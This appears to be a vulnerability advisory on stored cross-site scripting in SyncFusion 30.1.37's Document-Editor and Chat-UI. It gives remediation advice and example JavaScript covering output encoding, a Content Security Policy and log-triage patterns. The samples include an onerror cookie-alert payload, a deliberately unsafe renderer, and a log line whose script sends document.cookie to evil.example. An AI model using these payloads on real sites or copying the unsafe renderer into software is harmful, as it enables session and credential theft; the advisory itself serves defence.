CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Description
SyncFusion 30.1.37 is vulnerable to Cross Site Scripting (XSS) via the Document-Editor reply to comment field and Chat-UI Chat message.
Analysis
SyncFusion 30.1.37 (and possibly earlier releases; see Affected Products) contains stored Cross-Site Scripting (XSS) vulnerabilities in two distinct UI components: the Document-Editor reply-to-comment field and the Chat-UI chat message field. An attacker with an account that can post a comment reply or chat message (the vector's PR:L) can submit a JavaScript payload through these fields; it is stored and later executed in the browser of any other user who views the affected comment thread or chat (UI:R), potentially enabling session hijacking, credential theft, or actions performed with the victim's privileges in the hosting application. The listed CVSS 3.1 vector (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) corresponds to a 5.4 (Medium) base score; no EPSS data or KEV status is currently available. Proof-of-concept exploitation details are documented in the pentest-tools reference (PTT-2025-023-Multiple-Stored-XSS.pdf).
Technical Context
The vulnerability stems from improper input validation and missing output encoding in SyncFusion's Document-Editor and Chat-UI components: user-supplied comment and chat text is stored in application state or a backing database and later rendered back as HTML without being HTML-encoded or sanitized, so markup and script contained in the stored text are interpreted by the viewing user's browser. This is a classic stored XSS flaw (CWE-79: Improper Neutralization of Input During Web Page Generation): the payload traverses the application's persistence layer and fires for every later viewer, rather than being reflected once to the submitter. The vector's scope is Changed (S:C), the usual scoring for XSS, because the vulnerable component is the application serving the content while the impact lands in the victim's browser. The CPE entry attached to the record is a placeholder (cpe:2.3:a:n/a:n/a:*:*:*:*:*:*:*:*) and does not narrow the affected product, version range, or platform; exact version granularity is not specified in the available metadata.
Affected Products
SyncFusion 30.1.37 is confirmed affected; earlier versions may also be affected but are not confirmed by the available data. The vulnerability impacts SyncFusion's Document-Editor component (reply-to-comment feature) and Chat-UI component (chat message field). The CPE reference (cpe:2.3:a:n/a:n/a:*:*:*:*:*:*:*:*) is a placeholder and does not specify the product name or version range; vendor contact information is available at http://syncfusion.com. Confirm the affected version range (only 30.1.37, or releases before it as well) and the first fixed release directly from SyncFusion's security advisories before deciding which deployments need action.
Remediation
Check SyncFusion's security advisory portal at http://syncfusion.com for a fixed release and upgrade the Document-Editor and Chat-UI components as soon as one is available. Until a patch is available, apply the following mitigations, listed in order of priority. First, encode on output: HTML-entity-encode every comment and chat message at render time, wherever it is inserted into the DOM. Encoding before storage is not a substitute, because the same stored value may later be rendered in several contexts (HTML body, attribute, JSON) and it corrupts legitimate text containing characters such as & and <. Second, if rich text must be preserved, sanitize the HTML at render time with an allow-list sanitizer such as DOMPurify in the browser or the OWASP Java HTML Sanitizer on the server, rather than trying to block known-bad patterns, and check whether the components expose a built-in HTML sanitizer option that can be enabled. Third, deploy a Content Security Policy whose script-src omits 'unsafe-inline' and uses nonces or hashes; this stops inline event handlers and javascript: URLs from executing even if a payload reaches the page, but it is defence in depth, not a fix. Fourth, apply server-side input validation (length limits, expected character set) on comment and chat submissions; this limits what an attacker can store but does not by itself prevent XSS. Finally, if plain text suffices, disable rich-text formatting in the affected fields temporarily.
Review application and access logs for comment-reply and chat-message submissions that contain script tags, event-handler attributes, or javascript: URLs, and consult the pentest-tools proof-of-concept document (https://pentest-tools.com/PTT-2025-023-Multiple-Stored-XSS.pdf) for the specific payload patterns to monitor and block.
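The following JavaScript is an added illustration of the encode-on-output, CSP and log-review points above; it is example code, not Syncfusion's code and not the PoC document's payloads. The comment object, the API routes and the access-log lines are constructed for the example, and the triage markers are deliberately coarse (they surface lines for a human, they are not a blocklist).

```javascript
// Added example, not Syncfusion code: encode-on-output for a stored comment or
// chat message, a CSP value that blocks inline script, and a log triage helper.
// Route names, the comment object and the log lines below are constructed.

// HTML-entity-encode a value for insertion into an HTML text node or a
// double-quoted attribute. Encoding happens at render time, not at storage.
function escapeHtml(untrusted) {
  return String(untrusted)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Vulnerable pattern: stored text interpolated straight into markup. Assigning
// this string to innerHTML runs the attacker's handler in the viewer's browser.
function renderCommentUnsafe(comment) {
  return `<div class="comment"><b>${comment.author}</b>: ${comment.text}</div>`;
}

// Hardened pattern: same markup, every untrusted value encoded on output.
function renderCommentSafe(comment) {
  return `<div class="comment"><b>${escapeHtml(comment.author)}</b>: ${escapeHtml(comment.text)}</div>`;
}

// Content-Security-Policy value for the hosting page. No 'unsafe-inline', so
// inline event handlers and javascript: URLs do not execute; only <script>
// elements carrying the per-response nonce do. The caller must generate the
// nonce with a CSPRNG (e.g. crypto.randomBytes(16)) for every response.
function buildCsp(nonce) {
  return [
    "default-src 'self'",
    `script-src 'self' 'nonce-${nonce}'`,
    "object-src 'none'",
    "base-uri 'self'",
  ].join("; ");
}

// Coarse markers for log triage (encoding tricks bypass them; review by hand).
const XSS_MARKERS = [
  /<\s*script\b/i,
  /\bon[a-z]+\s*=/i, // onerror=, onload=, ...
  /javascript\s*:/i,
  /<\s*(img|svg|iframe|object|embed)\b/i,
];

// URL-decode a line so that percent-encoded payloads are matched; keep the
// raw line if it is not valid percent-encoding.
function safeDecode(s) {
  try {
    return decodeURIComponent(s);
  } catch (_) {
    return s;
  }
}

// Return the log lines whose decoded form carries any marker.
function flagSuspiciousLogLines(lines) {
  return lines.filter((line) => {
    const decoded = safeDecode(line);
    return XSS_MARKERS.some((re) => re.test(decoded));
  });
}

// Constructed sample data for the functions above.
const SAMPLE_COMMENT = {
  author: "mallory",
  text: '<img src=x onerror="alert(document.cookie)">',
};

const SAMPLE_LOG = [
  '10.0.0.5 - - [01/Jul/2025:10:01:02 +0000] "POST /api/comments/reply HTTP/1.1" 200 body=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E',
  '10.0.0.7 - - [01/Jul/2025:10:01:05 +0000] "POST /api/chat/messages HTTP/1.1" 200 body=hello%20team',
  '10.0.0.5 - - [01/Jul/2025:10:02:11 +0000] "POST /api/chat/messages HTTP/1.1" 200 body=%3Cscript%3Efetch(%27https://evil.example/%3F%27%2Bdocument.cookie)%3C/script%3E',
];

if (typeof require !== "undefined" && require.main === module) {
  console.log(renderCommentUnsafe(SAMPLE_COMMENT));
  console.log(renderCommentSafe(SAMPLE_COMMENT));
  console.log(buildCsp("d3mo-n0nce"));
  console.log(flagSuspiciousLogLines(SAMPLE_LOG));
}
```

The safe renderer produces the same visible text as the unsafe one but the browser treats the payload as characters, not as an element with an event handler. The CSP value is what the hosting application should send as a response header; it does not repair the component, it only prevents the inline handler from running if a payload is rendered anyway.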
EUVD-2025-208909